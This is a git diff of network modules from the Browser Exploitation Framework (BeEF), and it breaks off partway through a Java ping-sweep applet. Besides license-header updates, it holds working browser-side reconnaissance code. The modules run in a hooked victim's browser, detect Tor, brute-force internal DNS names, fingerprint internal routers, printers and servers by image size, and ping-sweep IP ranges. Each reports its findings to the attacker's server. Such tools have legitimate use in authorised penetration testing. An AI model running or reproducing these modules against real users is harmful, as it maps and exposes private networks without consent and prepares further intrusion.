78b94c763..95e89dd97 100644 --- a/modules/network/detect_tor/command.js +++ b/modules/network/detect_tor/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if (document.getElementById('torimg')) { @@ -23,7 +14,9 @@ beef.execute(function() { img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); - img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif'; + //img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif'; + //img.src = 'http://xycpusearchon2mc.onion/deeplogo.jpg' + img.src = '<%= @tor_resource %>'; img.id = 'torimg'; img.setAttribute("attr","start"); img.onerror = function() { diff --git a/modules/network/detect_tor/config.yaml b/modules/network/detect_tor/config.yaml index d0294391e..710f496c9 100644 --- a/modules/network/detect_tor/config.yaml +++ b/modules/network/detect_tor/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb index f75c91be9..65e7532c0 100644 --- a/modules/network/detect_tor/module.rb +++ b/modules/network/detect_tor/module.rb @@ -1,22 +1,13 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_tor < BeEF::Core::Command def self.options return [ + {'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'}, {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'} ] end diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js index 4e3ea47d0..172a34c2d 100644 --- a/modules/network/dns_enumeration/command.js +++ b/modules/network/dns_enumeration/command.js @@ -1,43 +1,34 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dns_list = "<%= @dns_list %>"; var timeout = parseInt("<%= @timeout %>"); - var cont=0; + var cont=0; var port = 900; var protocol="http://"; var hostnames; if(dns_list!="%default%") { - hostnames = dns_list.split(","); + hostnames = dns_list.split(","); } else { hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml"); } - + function notify() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]); check_next(); } - - function check_next() { + + function check_next() { cont++; - if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); + if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); } function do_resolv(url) { @@ -51,15 +42,15 @@ beef.execute(function() { } else { return -1; } - + xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } }; xhr.send(); - var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000); + var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout); } beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded'); if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); } }); diff --git a/modules/network/dns_enumeration/config.yaml b/modules/network/dns_enumeration/config.yaml index 93327e416..ae29a432e 100644 --- a/modules/network/dns_enumeration/config.yaml +++ b/modules/network/dns_enumeration/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/dns_enumeration/module.rb b/modules/network/dns_enumeration/module.rb index 21449af1d..e766ecf85 100644 --- a/modules/network/dns_enumeration/module.rb +++ b/modules/network/dns_enumeration/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # DNS Enumeration diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index ddcd897cd..8d4f1f85d 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -1,24 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dom = document.createElement('b'); var ips = new Array(); ipRange = "<%= @ipRange %>"; - ports = "<%= @ports %>"; + ports = "<%= @ports %>"; if(ports != null){ ports = ports.split(','); } @@ -26,7 +17,7 @@ beef.execute(function() { if(ipRange != null){ // ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated. // (only C class IPs are supported atm) - ipBounds = ipRange.split('-'); + ipBounds = ipRange.split('-'); lowerBound = ipBounds[0].split('.')[3]; upperBound = ipBounds[1].split('.')[3]; @@ -56,72 +47,193 @@ beef.execute(function() { ]; } + /* URLs in the form of: + "Dev/App Name", -- string + "Default Port", -- string + "Protocol", -- string -- http/https + "Use Multiple Ports if specified", -- boolean + "IMG path", -- string -- file path + "IMG width", -- integer + "IMG height" -- integer + */ var urls = new Array( - // in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height" - new Array("Apache",":80",false,"/icons/apache_pb.gif",259,32), - new Array("Apache 2.x",":80",false,"/icons/apache_pb2.gif",259,32), - new Array("Microsoft IIS 7.x",":80",false,"/welcome.png",571,411), - new Array("Microsoft IIS",":80",false,"/pagerror.gif",36,48), - new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16), - new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21), - new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28), - new Array("Billion Router",":80",false,"/customized/logo.gif",318,69), - new Array("Billion Router",":80",false,"/customized/logo.gif",224,55), - new Array("SMC Networks",":80",false,"/images/logo.gif",133,59), - new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52), - new Array("Linksys NAS",":80",false,"/logo.jpg",194,52), - new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250), - new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97), - new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66), - new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62), - new Array("Dell Laser Printer",":80",false,"/ews/images/delllogo.gif",100,100), - new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52), - new Array("HP LaserJet Printer",":80",false,"/hp/device/images/logo.gif",42,27), - new Array("HP LaserJet Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52), - new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105), - new Array("Siemens Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76), - new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327), - new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26), - new Array("TwonkyMedia Server",":9000",false,"/images/TwonkyMediaServer_logo.jpg",150,82), - new Array("Alt-N MDaemon World Client",":3000",false,"/LookOut/biglogo.gif",342,98), - new Array("VLC Media Player",":8080",false,"/images/white_cross_small.png",9,9), - new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100), - new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31), - new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59), - new Array("Xerox Printer",":80",false,"/printbut.gif",30,30), - new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26), - new Array("Epson Printer",":80",false,"/cyandot.gif",1,1), - new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52), - new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60), - new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30), - new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16), - new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149), - new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32), - new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16), - new Array("Glassfish Server",":4848",false,"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200) + new Array( + "Apache", + "80","http",false, + "/icons/apache_pb.gif",259,32), + new Array( + "Apache 2.x", + "80","http",false, + "/icons/apache_pb2.gif",259,32), + new Array( + "Microsoft IIS 7.x", + "80","http",false, + "/welcome.png",571,411), + new Array( + "Microsoft IIS", + "80","http",false, + "/pagerror.gif",36,48), + new Array( + "QNAP NAS", + "8080","http",false, + "/ajax_obj/img/running.gif",16,16), + new Array( + "QNAP NAS", + "8080","http",false, + "/ajax_obj/images/qnap_logo_w.gif",115,21), + new Array( + "Belkin Router", + "80","http",false, + "/images/title_2.gif",321,28), + new Array( + "Billion Router", + "80","http",false, + "/customized/logo.gif",318,69), + new Array( + "Billion Router", + "80","http",false, + "/customized/logo.gif",224,55), +// new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59), + new Array( + "Linksys NAS", + "80","http",false, + "/Admin_top.JPG",750,52), + new Array( + "Linksys NAS", + "80","http",false, + "/logo.jpg",194,52), + new Array( + "Linksys Network Camera", + "80","http",false, + "/welcome.jpg",146,250), + new Array( + "Linksys Wireless-G Camera", + "80","http",false, + "/header.gif",750,97), + new Array( + "Cisco IP Phone", + "80","http",false, + "/Images/Logo",120,66), + new Array( + "Snom Phone", + "80","http",false, + "/img/snom_logo.png",168,62), + new Array( + "Dell Laser Printer", + "80","http",false, + "/ews/images/delllogo.gif",100,100), + new Array( + "Brother Printer", + "80","http",false, + "/pbio/brother.gif",144,52), + new Array( + "HP LaserJet Printer", + "80","http",false, + "/hp/device/images/logo.gif",42,27), + new Array( + "HP LaserJet Printer", + "80","http",false, + "/hp/device/images/hp_invent_logo.gif",160,52), + new Array( + "JBoss Application server", + "8080","http",true, + "/images/logo.gif",226,105), +// new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76), + new Array( + "APC InfraStruXure Manager", + "80","http",false, + "/images/Xlogo_Layer-1.gif",342,327), + new Array( + "Barracuda Spam/Virus Firewall", + "8000","http",true, + "/images/powered_by.gif",211,26), + new Array( + "TwonkyMedia Server", + "9000","http",false, + "/images/TwonkyMediaServer_logo.jpg",150,82), +// new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98), +// new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9), + new Array( + "VMware ESXi Server", + "80","http",false, + "/background.jpeg",1,1100), + new Array( + "Microsoft Remote Web Workplace", + "80","http",false, + "/Remote/images/submit.gif",31,31), + new Array( + "XAMPP", + "80","http",false, + "/xampp/img/xampp-logo-new.gif",200,59), + new Array( + "Xerox Printer", + "80","http",false, + "/printbut.gif",30,30), + new Array( + "Konica Minolta Printer", + "80","http",false, + "/G27_light.gif",206,26), + new Array( + "Epson Printer", + "80","http",false, + "/cyandot.gif",1,1), + new Array( + "HP Printer", + "80","http",false, + "/hp/device/images/hp_invent_logo.gif",160,52), +// new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60), +// new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30), + new Array( + "Zenoss", + "8080","http",false, + "/zport/dmd/favicon.ico",16,16), + new Array( + "BeEF", + "3000","http",false, + "/ui/media/images/beef.png",200,149), + new Array( + "BeEF (PHP)", + "80","http",false, + "/beef/images/beef.gif",32,32), + new Array( + "Wordpress", + "80","http",true, + "/wp-includes/images/wpmini-blue.png",16,16), + new Array( + "Glassfish Server", + "4848","http",false, + "/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200), + new Array( + "pfSense", + "443","https",false, + "/themes/pfsense_ng/images/logo.gif",200,56), + new Array( + "m0n0wall", + "80","http",false, + "/logo.gif",150,47) ); // for each ip for(var i=0; i < ips.length; i++) { // for each url for(var u=0; u < urls.length; u++) { - if(!urls[u][2] && ports != null){ // use default port - var img = new Image; - //console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); - img.id = u; - img.src = "http://"+ips[i]+urls[u][1]+urls[u][3]; - img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } - dom.appendChild(img); - }else{ // iterate to all the specified ports - for(p=0;p', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } - dom.appendChild(img); - } - } + if(!urls[u][3] && ports != null){ // use default port + var img = new Image; + beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); + img.id = u; + img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4]; + img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } + dom.appendChild(img); + } else { // iterate to all the specified ports + for(p=0;p', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } + dom.appendChild(img); + } + } } } }); diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml index 2b87ff7c9..85a0551c4 100644 --- a/modules/network/internal_network_fingerprinting/config.yaml +++ b/modules/network/internal_network_fingerprinting/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb index b4eff3e26..11d84bbd4 100644 --- a/modules/network/internal_network_fingerprinting/module.rb +++ b/modules/network/internal_network_fingerprinting/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Internal Network Fingerprinting diff --git a/modules/network/nat_pinning_irc/command.js b/modules/network/nat_pinning_irc/command.js index 4caef4fef..5785a2796 100644 --- a/modules/network/nat_pinning_irc/command.js +++ b/modules/network/nat_pinning_irc/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var privateip = '<%= @privateip %>'; var privateport = '<%= @privateport %>'; diff --git a/modules/network/nat_pinning_irc/config.yaml b/modules/network/nat_pinning_irc/config.yaml index 784c7e7be..2c16fb586 100644 --- a/modules/network/nat_pinning_irc/config.yaml +++ b/modules/network/nat_pinning_irc/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/nat_pinning_irc/module.rb b/modules/network/nat_pinning_irc/module.rb index a934c79da..d8e2f6b23 100644 --- a/modules/network/nat_pinning_irc/module.rb +++ b/modules/network/nat_pinning_irc/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Irc_nat_pinning < BeEF::Core::Command diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js index acddd61ea..f796310e2 100644 --- a/modules/network/ping_sweep/command.js +++ b/modules/network/ping_sweep/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ips = new Array(); diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml index 1e9fa9a7d..9a47db7d4 100644 --- a/modules/network/ping_sweep/config.yaml +++ b/modules/network/ping_sweep/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb index cc8c7120d..3517326b6 100644 --- a/modules/network/ping_sweep/module.rb +++ b/modules/network/ping_sweep/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Ping Sweep Module - jgaliana diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js index cd5fcc719..75304958d 100644 --- a/modules/network/ping_sweep_java/command.js +++ b/modules/network/ping_sweep_java/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ipRange = "<%= @ipRange %>"; @@ -24,7 +15,7 @@ beef.execute(function() { var internal_counter = 0; var firstMsgSent = false; - beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', "http://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]); + beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]); function waituntilok() { try { diff --git a/modules/network/ping_sweep_java/config.yaml b/modules/network/ping_sweep_java/config.yaml index 5b11939b2..fc6772d17 100644 --- a/modules/network/ping_sweep_java/config.yaml +++ b/modules/network/ping_sweep_java/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/ping_sweep_java/module.rb b/modules/network/ping_sweep_java/module.rb index 4342f61f6..ec30195a4 100644 --- a/modules/network/ping_sweep_java/module.rb +++ b/modules/network/ping_sweep_java/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Ping Sweep Module - jgaliana diff --git a/modules/network/ping_sweep_java/pingSweep.java b/modules/network/ping_sweep_java/pingSweep.java index 0459ebc6a..b67a4c8df 100644 --- a/modules/network/ping_sweep_java/pingSweep.java +++ b/modules/network/ping_sweep_java/pingSweep.java @@ -1,77 +1,83 @@ -import java.applet.Applet; -import java.io.IOException; -import java.net.InetAddress; -import java.net.UnknownHostException; -import java.util.ArrayList; -import java.util.List; - -/* - * Coded by Michele "antisnatchor" Orru' for the BeEF project. - * Given a single IP or IP range, check without hosts are alive (ping sweep). - */ -public class pingSweep extends Applet { - - public static String ipRange = ""; - public static int timeout = 0; - public static List hostList; - - public pingSweep() { - super(); - return; - } - - public void init(){ - ipRange = getParameter("ipRange"); - timeout = Integer.parseInt(getParameter("timeout")); - } - - //called from JS - public static int getHostsNumber(){ - try{ - hostList = parseIpRange(ipRange); - }catch(UnknownHostException e){ //do something - - } - return hostList.size(); - } - - //called from JS - public static String getAliveHosts(){ - String result = ""; - try{ - result = checkHosts(hostList); - }catch(IOException io){ - //do something - } - return result; - } - - private static List parseIpRange(String ipRange) throws UnknownHostException { - - List addresses = new ArrayList(); - if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 - String[] ips = ipRange.split("-"); - String[] octets = ips[0].split("\\."); - int lowerBound = Integer.parseInt(octets[3]); - int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); - - for (int i = lowerBound; i <= upperBound; i++) { - String ip = octets[0] + "." + octets[1] + 